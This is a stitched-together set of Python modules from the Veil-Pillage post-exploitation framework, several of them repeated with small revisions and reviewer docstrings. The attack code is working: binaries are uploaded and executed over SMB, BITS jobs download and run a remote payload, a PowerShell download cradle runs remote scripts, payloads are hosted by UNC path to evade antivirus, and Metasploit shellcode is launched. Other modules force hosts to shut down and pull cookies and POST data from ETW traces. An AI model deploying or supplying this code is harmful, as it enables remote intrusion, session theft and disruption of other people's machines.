    def run(self):
        """Upload netview.exe to every target and launch it.

        Only the first (username, password) pair in self.creds is used. The
        binary is copied to C:\\Windows\\Temp\\netview.exe over the C$ share
        and started through the configured trigger method; its report goes
        to the ``out_file`` option (a name without a backslash is placed
        under C:\\Windows\\Temp). The ``args`` option, unless "none", is
        appended verbatim to the command line.

        Nothing here retrieves the report, removes the binary, or adds an
        entry to self.cleanup, so both files stay on the host until the
        operator deals with them. The credentials are echoed in cleartext
        into self.output.
        """
        username, password = self.creds[0]

        opts = self.required_options
        triggerMethod = opts["trigger_method"][0]
        out_file = opts["out_file"][0]
        args = opts["args"][0]

        # a bare file name lands in the temp directory; anything containing
        # a backslash is taken as a full path
        if "\\" not in out_file:
            out_file = "C:\\Windows\\Temp\\" + out_file

        # local copy of the tool that gets pushed to each target
        exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/netview.exe"

        # remote invocation, optional extra arguments appended unquoted
        cmd_parts = ["C:\\Windows\\Temp\\netview.exe -o " + out_file]
        if args != "none":
            cmd_parts.append(args)
        cmd = " ".join(cmd_parts)

        for target in self.targets:
            smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
            command_methods.executeCommand(target, username, password, cmd, triggerMethod)
            self.output += "[*] netview.exe uploaded and executed using creds '%s:%s' on %s using %s\n" % (username, password, target, triggerMethod)
    def run(self):
        """Schedule a BITS download-and-execute job on every target.

        The job (named by the ``job_name`` option) pulls ``exe_url`` into
        C:\\Windows\\Temp\\updater.exe and registers that file as the job's
        notification command, so BITS launches it once the transfer
        finishes. The retry delay is ``interval`` minutes. Only the first
        credential pair is used and winexe is always the trigger. A
        matching ``bitsadmin /cancel`` line is appended to self.cleanup for
        each target.

        Points a reviewer should weigh: job_name and exe_url are spliced
        into the command line without quoting, so a job name with a space
        breaks the bitsadmin syntax; ``interval`` must parse as an integer
        or int() raises ValueError before anything is sent; the downloaded
        file is executed with no integrity check beyond what the URL scheme
        provides; and the credentials are written in cleartext into
        self.output and self.cleanup.
        """
        username, password = self.creds[0]

        opts = self.required_options
        exe_url = opts["exe_url"][0]
        interval = opts["interval"][0]
        job_name = opts["job_name"][0]
        triggerMethod = "winexe"

        # /SETMINRETRYDELAY takes seconds; the option is in minutes
        retry_seconds = str(int(interval) * 60)
        drop_path = "C:\\Windows\\Temp\\updater.exe"

        # one cmd.exe line: create the job, add the transfer, hook the
        # notify command, set the retry delay, then resume (start) it
        steps = [
            "bitsadmin /create " + job_name,
            "bitsadmin /addfile " + job_name + " " + exe_url + " " + drop_path,
            "bitsadmin /SETNOTIFYCMDLINE " + job_name + " " + drop_path + " NULL",
            "bitsadmin /SETMINRETRYDELAY " + job_name + " " + retry_seconds,
            "bitsadmin /resume " + job_name,
        ]
        cmd = " & ".join(steps)

        # cancelling the job by name is the teardown step
        cleanupCMD = "bitsadmin /cancel " + job_name

        for target in self.targets:
            self.output += "[*] Bitsadmin job started with url %s using creds '%s:%s' on %s\n" % (exe_url, username, password, target)

            command_methods.executeCommand(target, username, password, cmd, triggerMethod=triggerMethod)
            self.cleanup += "|".join(["executeCommand", target, username, password, cleanupCMD, triggerMethod]) + "\n"
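def uploadTrigger(targets, username, password, exePath, triggerMethod="wmis", exeArgs=""):
    """
    Copy the executable at exePath to a randomly named file in the local
    temp directory, upload that copy to C:\\Windows\\Temp\\ on every target
    over the C$ share, and run it through triggerMethod (default wmis).

    targets           - a single host or a list of hosts
    username/password - credential pair used for the SMB upload and the trigger
    exePath           - local path of the binary to push
    triggerMethod     - execution method handed to command_methods.executeCommand
    exeArgs           - extra arguments appended to the remote command line

    Returns the randomised file name so the caller can clean up the process
    later. Raises the usual OSError/IOError from shutil.copy if exePath
    cannot be read or the temp directory cannot be written.

    The local staging copy is done with shutil.copy instead of a shell
    ``cp`` string: a path containing a space or shell metacharacter no
    longer breaks (or gets reinterpreted by) the command, and the staged
    path is built once with os.path.join so the copy destination and the
    path handed to smb.uploadFile are guaranteed to be the same file (the
    old code prefixed "/" on one and not the other). The random name only
    hides the drop; the binary itself lands on the target's disk unchanged.
    """
    import shutil

    # accept a single host as well as a list
    if isinstance(targets, str):
        targets = [targets]

    uploadFileName = helpers.randomString() + ".exe"
    stagedPath = os.path.join(settings.TEMP_DIR, uploadFileName)

    # stage the payload locally under its randomised name
    shutil.copy(exePath, stagedPath)

    # remote command line: the dropped binary plus caller-supplied arguments
    cmd = "C:\\Windows\\Temp\\" + uploadFileName + " " + exeArgs

    for target in targets:
        # drop the binary at C:\Windows\Temp\ on the host
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", stagedPath, 5)

        # and kick it off with the requested trigger method
        command_methods.executeCommand(target, username, password, cmd, triggerMethod)

    return uploadFileName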
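    def run(self):
        """Upload finddllhijack.exe to each target, run it, and store its output.

        Only the first credential pair is used. The binary is pushed to
        C:\\Windows\\Temp over C$, executed through the configured trigger
        method (executeResult waits 5 seconds for output), deleted again,
        and whatever came back is written via helpers.saveModuleFile as
        finddllhijack.txt.

        Change from the previous revision: the result file is only written
        when the tool actually returned output. Before, an empty result
        still went through saveModuleFile and the module then reported
        "no result file", which is misleading and inconsistent with the
        other collection modules (enum_host, etw_results) that save only on
        success.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]

        exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe"
        remotePath = "C:\\Windows\\Temp\\finddllhijack.exe"

        for target in self.targets:
            # drop the binary at C:\Windows\Temp\ on the host
            smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)

            # run it and collect stdout after the pause
            out = command_methods.executeResult(target, username, password, remotePath, triggerMethod, pause=5)

            # remove the dropped binary whether or not it produced output
            command_methods.executeCommand(target, username, password, "del " + remotePath, triggerMethod)

            if out != "":
                saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out)
                self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"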
    def run(self):
        """Push netview.exe to each target over C$ and execute it.

        Uses only the first credential pair. The report is written on the
        host to the ``out_file`` option (bare names are placed under
        C:\\Windows\\Temp); ``args``, unless "none", is appended verbatim to
        the command line. The binary and the report are left on the host
        and nothing is added to self.cleanup. Credentials are recorded in
        cleartext in self.output.
        """
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        out_file = self.required_options["out_file"][0]
        args = self.required_options["args"][0]

        # no backslash -> relative name, drop it in the temp directory
        if "\\" not in out_file:
            out_file = "C:\\Windows\\Temp\\" + out_file

        exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/netview.exe"

        # remote command line; extra arguments are appended unquoted
        cmd = "C:\\Windows\\Temp\\netview.exe -o " + out_file
        if args != "none":
            cmd = "%s %s" % (cmd, args)

        report = "[*] netview.exe uploaded and executed using creds '" + username + ":" + password + "' on %s using " + triggerMethod + "\n"

        for target in self.targets:
            smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
            command_methods.executeCommand(target, username, password, cmd, triggerMethod)
            self.output += report % target
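def hostTrigger(targets, username, password, exePath, localHost, triggerMethod="wmis", exeArgs=""):
    """
    Host the binary at exePath on a temporary local Impacket SMB server and
    make every target run it by UNC path, so the executable is never
    written to the target's disk.

    targets           - a single host or a list of hosts (one server serves all)
    username/password - credential pair handed to the trigger method
    exePath           - local path of the binary to host
    localHost         - address the targets use to reach this machine's share
    triggerMethod     - execution method for command_methods.executeCommand
    exeArgs           - extra arguments appended to the remote command line

    Returns the randomised hosted file name for later process cleanup.

    Note from the original author: the UNC launch evades several AV vendors,
    even for binaries that are caught when dropped to disk. Operationally
    the targets must reach localHost on TCP 445, and the share is only up
    for the fixed wait below; a slow trigger misses it.

    Review notes on this revision: the hosted directory is built once with
    os.path.join (the old code used three differently joined strings --
    ``TEMP_DIR + "shared/"`` for mkdir, ``"/" + TEMP_DIR + "/shared/"`` for
    cp -- that only agreed when TEMP_DIR was absolute and slash-terminated);
    the copy and removal use shutil instead of shell strings built from
    paths; and the server is shut down in a finally so a failing trigger
    does not leave it listening. The share root that ThreadedSMBServer
    exposes as "system" is configured in the smb module, not here --
    confirm it resolves to the same directory as sharedDir.
    """
    import shutil

    # accept a single host as well as a list
    if isinstance(targets, str):
        targets = [targets]

    hostedFileName = helpers.randomString() + ".exe"
    sharedDir = os.path.join(settings.TEMP_DIR, "shared")

    if not os.path.exists(sharedDir):
        os.makedirs(sharedDir)

    # stage the payload under its randomised name in the hosted directory
    shutil.copy(exePath, os.path.join(sharedDir, hostedFileName))

    # UNC path back to us plus any caller-supplied arguments
    cmd = "\\\\" + localHost + "\\system\\" + hostedFileName + " " + exeArgs

    server = smb.ThreadedSMBServer()
    server.start()
    time.sleep(.5)

    try:
        for target in targets:
            command_methods.executeCommand(target, username, password, cmd, triggerMethod)

        print(helpers.color("\n [*] Giving time for commands to trigger..."))
        # give the wmis/winexe commands time to fire and the targets time to
        # pull the .exe from the share before it goes away
        time.sleep(10)
    finally:
        server.shutdown()
        # the hosted copy is only needed while the server is up
        shutil.rmtree(sharedDir, ignore_errors=True)

    return hostedFileName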
    def run(self):
        """Build a Veil-Evasion PowerShell shellcode launcher and fire it on each target.

        Only the first credential pair is used. The payload object comes
        from virtual.Payload, fed either msfpayload/msfoptions or custom
        shellcode from self.args; p.generate() yields the one-line
        PowerShell command that is passed to command_methods.executeCommand
        through the configured trigger method. If spawn_handler is "true"
        and a handler script can be derived from the shellcode, msfconsole
        is started in a new gnome-terminal tab and the operator is asked to
        confirm it is up before any target is touched.

        Caveats: the handler is launched with os.system and handlerPath is
        spliced unquoted into that shell string (it comes from
        helpers.shellcodeToHandler, so operator-controlled, but a path with
        a quote still breaks it); the cleanup entry is ``taskkill /f /im
        powershell.exe``, which kills every powershell.exe on the target,
        not only the injected one; and the credentials are recorded in
        cleartext in self.output and self.cleanup.
        """
        username, password = self.creds[0]

        opts = self.required_options
        triggerMethod = opts["trigger_method"][0]
        spawnHandler = opts["spawn_handler"][0]

        p = virtual.Payload()
        if self.args.msfpayload:
            p.shellcode.SetPayload([self.args.msfpayload, self.args.msfoptions])
        elif self.args.custshell:
            p.shellcode.setCustomShellcode(self.args.custshell)
        powershellCommand = p.generate()

        # Veil-Evasion clears the screen while generating; restore the banner
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

        if spawnHandler.lower() == "true":
            handlerPath = helpers.shellcodeToHandler(p.shellcode)
            if handlerPath != "":
                # new terminal tab running msfconsole with the handler resource file
                handlerCmd = ("gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c "
                              "\"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"")
                os.system(handlerCmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # cleanup kills every powershell.exe on the host, not just ours
        killCMD = "taskkill /f /im powershell.exe"

        for target in self.targets:
            print(helpers.color(" [*] Triggering powershell command on " + target))
            command_methods.executeCommand(target, username, password, powershellCommand, triggerMethod)
            self.output += "[*] Powershell inject command triggered using creds '%s:%s' on %s with %s\n" % (username, password, target, triggerMethod)
            self.cleanup += "|".join(["executeCommand", target, username, password, killCMD, triggerMethod]) + "\n"
    def run(self):
        """Generate a PowerShell shellcode launcher with Veil-Evasion and run it on each target.

        The first credential pair is used throughout. virtual.Payload is
        loaded with msfpayload/msfoptions or custom shellcode from
        self.args and p.generate() returns the PowerShell one-liner that is
        executed per target through the configured trigger method. With
        spawn_handler "true", a handler resource file is derived from the
        shellcode (if helpers.shellcodeToHandler returns one), msfconsole
        is opened in a new gnome-terminal tab via os.system, and the
        operator confirms before targets are hit.

        Caveats: handlerPath is interpolated unquoted into the os.system
        string; the recorded cleanup command ``taskkill /f /im
        powershell.exe`` terminates every PowerShell process on the host,
        legitimate ones included; credentials are written in cleartext to
        self.output and self.cleanup.
        """
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        payload = virtual.Payload()
        if self.args.msfpayload:
            payload.shellcode.SetPayload([self.args.msfpayload, self.args.msfoptions])
        elif self.args.custshell:
            payload.shellcode.setCustomShellcode(self.args.custshell)
        powershellCommand = payload.generate()

        # shellcode generation trashes the screen; redraw the banner and module line
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

        if spawnHandler.lower() == "true":
            handlerPath = helpers.shellcodeToHandler(payload.shellcode)
            if handlerPath != "":
                spawnCmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '%s'\"" % handlerPath
                os.system(spawnCmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # kills every powershell.exe on the host, not only the injected one
        killCMD = "taskkill /f /im powershell.exe"
        credTag = "creds '" + username + ":" + password + "'"

        for target in self.targets:
            print(helpers.color(" [*] Triggering powershell command on " + target))
            command_methods.executeCommand(target, username, password, powershellCommand, triggerMethod)
            self.output += "[*] Powershell inject command triggered using " + credTag + " on " + target + " with " + triggerMethod + "\n"
            self.cleanup += "executeCommand|%s|%s|%s|%s|%s\n" % (target, username, password, killCMD, triggerMethod)
    def run(self):
        """Force an immediate shutdown of every target.

        Runs ``shutdown -t 0 -s -f`` (no delay, shut down, force-close
        applications) through the configured trigger method with the first
        credential pair, and records per target in self.output whether the
        trigger's result contained "success". This is destructive: unsaved
        work on the host is lost and the host stays down until someone
        powers it on again. Credentials are recorded in cleartext in
        self.output.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]

        # shutdown.exe: immediate, forced power-off
        command = "shutdown -t 0 -s -f"
        credTag = "creds '" + username + ":" + password + "' on : "

        for target in self.targets:
            result = command_methods.executeCommand(target, username, password, command, triggerMethod)
            if "success" in result:
                self.output += "[*] Shutdown command successfully triggered using " + credTag + target + "\n"
            else:
                self.output += "[!] Shutdown command unsuccessful using " + credTag + target + "\n"
    def run(self):
        """Collect a host-enumeration bundle from each target and save it locally.

        One cmd.exe line appends the output of ipconfig /all, arp -a,
        net users, net sessions, qwinsta, netstat -nao, tasklist /v and
        systeminfo, each under a label, to the ``out_file`` option (bare
        names go under C:\\Windows\\Temp). After a fixed 20 second wait the
        file is pulled back over SMB and deleted on the host, then stored
        via helpers.saveModuleFile as enum_host.txt. Only the first
        credential pair is used.

        The 20 seconds is a guess at how long systeminfo needs; on a slow or
        domain-joined host the file may be fetched before the last commands
        finish. Because every command uses ``>>``, an out_file that already
        exists is appended to, not replaced. Credentials appear in cleartext
        in self.output.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]
        outFile = self.required_options["out_file"][0]

        # bare file names land in the temp directory; anything containing
        # a backslash is used as given
        if "\\" not in outFile:
            outFile = "C:\\Windows\\Temp\\" + outFile

        # label/command pairs, each redirected (appended) to the same file
        sections = [
            ("IPCONFIG:", "ipconfig /all"),
            ("ARP:", "arp -a"),
            ("NET USERS:", "net users"),
            ("NET SESSIONS:", "net sessions"),
            ("QWINSTA:", "qwinsta"),
            ("NETSTAT:", "netstat -nao"),
            ("TASKLIST:", "tasklist /v"),
            ("SYSTEMINFO:", "systeminfo"),
        ]
        command = "&".join(
            "echo " + label + ">>" + outFile + "&" + tool + ">>" + outFile
            for label, tool in sections)

        for target in self.targets:
            command_methods.executeCommand(target, username, password, command, triggerMethod)

            # systeminfo is the slow one; give the whole chain time to finish
            print(helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '" + target + "'", status=True))
            time.sleep(20)

            # fetch the report and remove it from the host
            out = smb.getFile(target, username, password, outFile, delete=True)

            if out != "":
                saveFile = helpers.saveModuleFile(self, target, "enum_host.txt", out)
                self.output += "[*] enum_host results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] enum_host failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
    def run(self):
        """Stop the Status32 ETW trace on each target and pull matching entries.

        ``logman stop Status32 -ets`` ends the trace that a companion module
        started, then wevtutil renders C:\\Windows\\Temp\\status32.etl as
        text and ``find /i`` filters it for either "POST" (flag option
        "post", saved as post_params.txt) or "cookie added" (any other
        value, saved as cookies.txt). The trace file is deleted afterwards
        whether or not anything matched. Only the first credential pair is
        used.

        The 20 second pause is how long executeResult waits for wevtutil;
        the original author's note is to raise it if parsing errors show
        up. What the trace actually captured depends on how Status32 was
        configured elsewhere. Credentials appear in cleartext in
        self.output.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]
        flag = self.required_options["flag"][0]

        # map the option onto the literal search string and the report name;
        # the mapping is idempotent so it is done once rather than per target
        if flag.lower() == "post":
            flag, moduleFile = "POST", "post_params.txt"
        else:
            flag, moduleFile = "cookie added", "cookies.txt"

        stopCMD = "logman stop Status32 -ets"
        traceFile = "C:\\Windows\\Temp\\status32.etl"
        parseCmd = "wevtutil qe " + traceFile + " /lf:true /f:Text | find /i \"" + flag + "\""
        delCmd = "del " + traceFile

        for target in self.targets:
            command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)

            parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)

            command_methods.executeCommand(target, username, password, delCmd, triggerMethod)

            if parseResult == "":
                self.output += "[!] No ETW results for " + flag + " using creds '" + username + ":" + password + "' on : " + target + "\n"
            else:
                saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
                self.output += "[*] ETW results for " + flag + " using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
def powershellTrigger(targets,
                      username,
                      password,
                      url,
                      scriptArguments="",
                      triggerMethod="wmis",
                      outFile=None,
                      noArch=False):
    """
    Run a PowerShell download cradle on each target that fetches a script
    from url, IEX-es it, and then runs scriptArguments.

    url                 - http/https URL of the second-stage script; a bare
                          host/path gets "http://" prefixed
    scriptArguments     - appended verbatim after the IEX call (e.g. a
                          PowerSploit invocation); "none" means empty
    triggerMethod       - execution method; smbexec is refused because the
                          encoded command exceeds its length limit
    outFile             - if given, " > outFile" is appended so the script's
                          output can be fetched later
    noArch              - skip the arch-independent launcher in encPowershell

    Returns "" when smbexec was requested (after prompting), otherwise None.

    Security notes: the cradle executes whatever the URL serves, in the
    context of the triggered account, so both the hosting server and the
    network path to it must be trusted -- over plain http anyone in the
    path can substitute the script. For https the cradle also sets
    ServerCertificateValidationCallback to always-true (meant for
    self-signed staging certs), which disables certificate checking for
    that whole PowerShell process, so https here gives encryption but not
    server authentication.
    """
    # smbexec cannot carry the encoded command line
    if triggerMethod.lower() == "smbexec":
        print(helpers.color("\n\n [!] Error: smbexec will not work with powershell invocation", warning=True))
        raw_input(" [*] press any key to return: ")
        return ""

    # accept a single host as well as a list
    if isinstance(targets, str):
        targets = [targets]

    # default to plain http when no scheme was given
    if not url.lower().startswith("http"):
        url = "http://" + url

    if scriptArguments.lower() == "none":
        scriptArguments = ""

    cradle = "IEX (New-Object Net.WebClient).DownloadString('" + url + "');" + scriptArguments
    if url.lower().startswith("https"):
        # accept any certificate, intended for self-signed hosting
        cradle = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" + cradle

    triggerCMD = helpers.encPowershell(cradle, noArch=noArch)

    # redirect the final output to a file for later retrieval if asked
    if outFile:
        triggerCMD += " > " + outFile

    for target in targets:
        print("\n [*] Executing command on " + target)
        command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)
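def uploadTrigger(targets,
                  username,
                  password,
                  exePath,
                  triggerMethod="wmis",
                  exeArgs=""):
    """
    Copy the executable at exePath to a randomly named file in the local
    temp directory, upload that copy to C:\\Windows\\Temp\\ on every target
    over the C$ share, and run it through triggerMethod (default wmis).

    targets           - a single host or a list of hosts
    username/password - credential pair used for the SMB upload and the trigger
    exePath           - local path of the binary to push
    triggerMethod     - execution method handed to command_methods.executeCommand
    exeArgs           - extra arguments appended to the remote command line

    Returns the randomised file name so the caller can clean up the process
    later. Raises the usual OSError/IOError from shutil.copy if exePath
    cannot be read or the temp directory cannot be written.

    The local staging copy is done with shutil.copy instead of a shell
    ``cp`` string: a path containing a space or shell metacharacter no
    longer breaks (or gets reinterpreted by) the command, and the staged
    path is built once with os.path.join so the copy destination and the
    path handed to smb.uploadFile are guaranteed to be the same file (the
    old code prefixed "/" on one and not the other). The random name only
    hides the drop; the binary itself lands on the target's disk unchanged.
    """
    import shutil

    # accept a single host as well as a list
    if isinstance(targets, str):
        targets = [targets]

    uploadFileName = helpers.randomString() + ".exe"
    stagedPath = os.path.join(settings.TEMP_DIR, uploadFileName)

    # stage the payload locally under its randomised name
    shutil.copy(exePath, stagedPath)

    # remote command line: the dropped binary plus caller-supplied arguments
    cmd = "C:\\Windows\\Temp\\" + uploadFileName + " " + exeArgs

    for target in targets:
        # drop the binary at C:\Windows\Temp\ on the host
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\",
                       stagedPath, 5)

        # and kick it off with the requested trigger method
        command_methods.executeCommand(target, username, password, cmd,
                                       triggerMethod)

    return uploadFileName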
    def run(self):
        """Create and start a BITS download-and-execute job on each target.

        The job named by ``job_name`` downloads ``exe_url`` to
        C:\\Windows\\Temp\\updater.exe and registers that path as its notify
        command, so BITS runs it when the transfer completes; the minimum
        retry delay is ``interval`` minutes. The first credential pair is
        used and the trigger is always winexe. Per target a
        ``bitsadmin /cancel`` line is appended to self.cleanup.

        Reviewer caveats: job_name and exe_url are inserted unquoted (a
        space in either breaks the bitsadmin syntax); a non-integer
        ``interval`` raises ValueError before anything runs; the fetched
        file is executed with no integrity check beyond the URL scheme; and
        credentials are written in cleartext to self.output and
        self.cleanup.
        """
        username, password = self.creds[0]

        exe_url = self.required_options["exe_url"][0]
        interval = self.required_options["interval"][0]
        job_name = self.required_options["job_name"][0]
        triggerMethod = "winexe"

        dropPath = "C:\\Windows\\Temp\\updater.exe"
        retrySeconds = int(interval) * 60

        # create -> addfile -> notify command -> retry delay -> resume, all on one line
        cmd = ("bitsadmin /create %(j)s & bitsadmin /addfile %(j)s %(u)s %(d)s & "
               "bitsadmin /SETNOTIFYCMDLINE %(j)s %(d)s NULL & "
               "bitsadmin /SETMINRETRYDELAY %(j)s %(s)d & bitsadmin /resume %(j)s"
               % {"j": job_name, "u": exe_url, "d": dropPath, "s": retrySeconds})

        # teardown: cancel the job by name
        cleanupCMD = "bitsadmin /cancel " + job_name

        for target in self.targets:
            self.output += "[*] Bitsadmin job started with url " + exe_url + " using creds '" + username + ":" + password + "' on " + target + "\n"

            command_methods.executeCommand(target, username, password, cmd, triggerMethod=triggerMethod)
            self.cleanup += "executeCommand|%s|%s|%s|%s|%s\n" % (target, username, password, cleanupCMD, triggerMethod)
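    def run(self):
        """Upload finddllhijack.exe to each target, run it, and store its output.

        Only the first credential pair is used. The binary is pushed to
        C:\\Windows\\Temp over C$, executed through the configured trigger
        method (executeResult waits 5 seconds for output), deleted again,
        and whatever came back is written via helpers.saveModuleFile as
        finddllhijack.txt.

        Change from the previous revision: the result file is only written
        when the tool actually returned output. Before, an empty result
        still went through saveModuleFile and the module then reported
        "no result file", which is misleading and inconsistent with the
        other collection modules (enum_host, etw_results) that save only on
        success.
        """
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe"
        remotePath = "C:\\Windows\\Temp\\finddllhijack.exe"

        for target in self.targets:
            # drop the binary at C:\Windows\Temp\ on the host
            smb.uploadFile(target, username, password, "C$",
                           "\\Windows\\Temp\\", exePath)

            # run it and collect stdout after the pause
            out = command_methods.executeResult(target,
                                                username,
                                                password,
                                                remotePath,
                                                triggerMethod,
                                                pause=5)

            # remove the dropped binary whether or not it produced output
            command_methods.executeCommand(
                target, username, password,
                "del " + remotePath, triggerMethod)

            if out != "":
                saveFile = helpers.saveModuleFile(self, target,
                                                  "finddllhijack.txt", out)
                self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"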
    def run(self):
        """Stop the Status32 ETW trace on each target and extract matching lines.

        Per target: ``logman stop Status32 -ets`` ends the trace a companion
        module started, wevtutil renders C:\\Windows\\Temp\\status32.etl as
        text, ``find /i`` keeps lines containing "POST" (flag "post", saved
        as post_params.txt) or "cookie added" (any other flag, saved as
        cookies.txt), and the .etl is deleted regardless of the result.
        Only the first credential pair is used.

        executeResult pauses 20 seconds for wevtutil; the original author
        suggests raising that if parse errors appear. The trace contents
        depend on how Status32 was configured elsewhere. Credentials are
        recorded in cleartext in self.output.
        """
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        flag = self.required_options["flag"][0]

        # option -> literal search string and report name (idempotent, so
        # resolved once up front instead of on every iteration)
        if flag.lower() == "post":
            flag, moduleFile = "POST", "post_params.txt"
        else:
            flag, moduleFile = "cookie added", "cookies.txt"

        traceFile = "C:\\Windows\\Temp\\status32.etl"
        stopCMD = "logman stop Status32 -ets"
        parseCmd = "wevtutil qe %s /lf:true /f:Text | find /i \"%s\"" % (traceFile, flag)
        delCmd = "del " + traceFile
        credTag = " using creds '" + username + ":" + password + "' on "

        for target in self.targets:
            command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)

            parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)

            command_methods.executeCommand(target, username, password, delCmd, triggerMethod)

            if parseResult == "":
                self.output += "[!] No ETW results for " + flag + credTag + ": " + target + "\n"
            else:
                saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
                self.output += "[*] ETW results for " + flag + credTag + target + " stored at " + saveFile + "\n"
    def run(self):
        """Log off session ID 1 on every target.

        Runs ``logoff 1`` (logoff.exe, not reg.exe) through the configured
        trigger method with the first credential pair and records per
        target in self.output whether the trigger's result contained
        "success". The hard-coded "1" is a session ID, not a user name;
        presumably intended to hit the first interactive session listed by
        ``query user``, but session numbering is host-specific -- verify
        with ``query user`` before relying on it. Whoever holds that
        session loses unsaved work. Credentials are written in cleartext
        into self.output.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]

        command = "logoff 1"
        credTag = "creds '" + username + ":" + password + "' on : "

        for target in self.targets:
            result = command_methods.executeCommand(target, username, password, command, triggerMethod)

            if "success" in result:
                self.output += "[*] Logoff command successfully triggered using " + credTag + target + "\n"
            else:
                self.output += "[!] Logoff command unsuccessful using " + credTag + target + "\n"
def powershellTrigger(targets, username, password, url, scriptArguments="", triggerMethod="wmis", outFile=None, noArch=False):
    """
    Trigger a specific url to download a powershell script from.

    targets             - a single host string or a list of hosts
    username/password   - the credential pair handed to command_methods.executeCommand
    url                 - the full url (http/https) to download the second stage script from;
                          "http://" is prepended when no scheme is present
    scriptArguments     - the arguments to pass to the script we're invoking ("none" means no arguments)
    triggerMethod       - the execution transport; "smbexec" is refused because of its length limit
    outFile             - if you want the script to output to a file for later retrieval, put a path here
    noArch              - don't do the arch-independent launcher

    Returns "" when smbexec is selected and None otherwise: the per-target result
    of executeCommand is bound to a local and discarded, so the caller cannot tell
    whether any trigger actually ran.

    Note: url and scriptArguments are spliced into the PowerShell text without any
    quoting or validation, so a single quote in url ends the DownloadString literal.
    For https urls the cradle sets ServerCertificateValidationCallback to {$true},
    which disables TLS certificate checking for the whole PowerShell process.
    """

    # this surpasses the length-limit implicit to smbexec I'm afraid :(
    if triggerMethod.lower() == "smbexec":
        print helpers.color("\n\n [!] Error: smbexec will not work with powershell invocation",warning=True)
        raw_input(" [*] press any key to return: ")
        return ""

    # if we get a single target, make it into a list
    # (only the str type is wrapped; a unicode host name would be iterated char by char)
    if type(targets) is str:
        targets = [targets]

    # if the url doesn't start with http/https, assume http
    if not url.lower().startswith("http"):
        url = "http://" + url

    if scriptArguments.lower() == "none": scriptArguments = ""

    # powershell command to download/execute our secondary stage,
    #   plus any scriptArguments we want to tack onto execution (i.e. PowerSploit)
    # for https, be sure to turn off warnings for self-signed certs in case we're hosting
    # (this is a process-wide callback, not a per-request exception)
    if url.lower().startswith("https"):
        downloadCradle = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('"+url+"');"+scriptArguments
        
    else:
        downloadCradle = "IEX (New-Object Net.WebClient).DownloadString('"+url+"');"+scriptArguments

    # get the encoded powershell command
    triggerCMD = helpers.encPowershell(downloadCradle, noArch=noArch)

    # if we want to get output from the final execution, append it
    # (outFile is appended unquoted; a path containing spaces breaks the redirection)
    if outFile: triggerCMD += " > " + outFile

    # execute the powershell trigger command on each target
    for target in targets:
        print "\n [*] Executing command on "+target
        # the result is never returned or inspected
        out = command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)
コード例 #19
    def run(self):
        """
        Issue an immediate forced shutdown on each target.

        Uses the first credential pair in self.creds and the configured
        trigger_method. Appends one status line per target to self.output;
        those lines embed the password in clear text. Returns None.
        """

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            # the built-in shutdown command (not reg.exe): -t 0 gives no grace period,
            # -s powers the machine off, -f closes applications without saving
            command = "shutdown -t 0 -s -f"
            result = command_methods.executeCommand(target, username, password,
                                                    command, triggerMethod)

            # success is a plain substring match on whatever executeCommand returns --
            # presumably the transport's text output; confirm the format in command_methods
            if "success" in result:
                self.output += "[*] Shutdown command successfully triggered using creds '" + username + ":" + password + "' on : " + target + "\n"
            else:
                self.output += "[!] Shutdown command unsuccessful using creds '" + username + ":" + password + "' on : " + target + "\n"
コード例 #20
    def run(self):
        """
        Force a logoff of session ID 1 on each target.

        Uses the first credential pair in self.creds and the configured
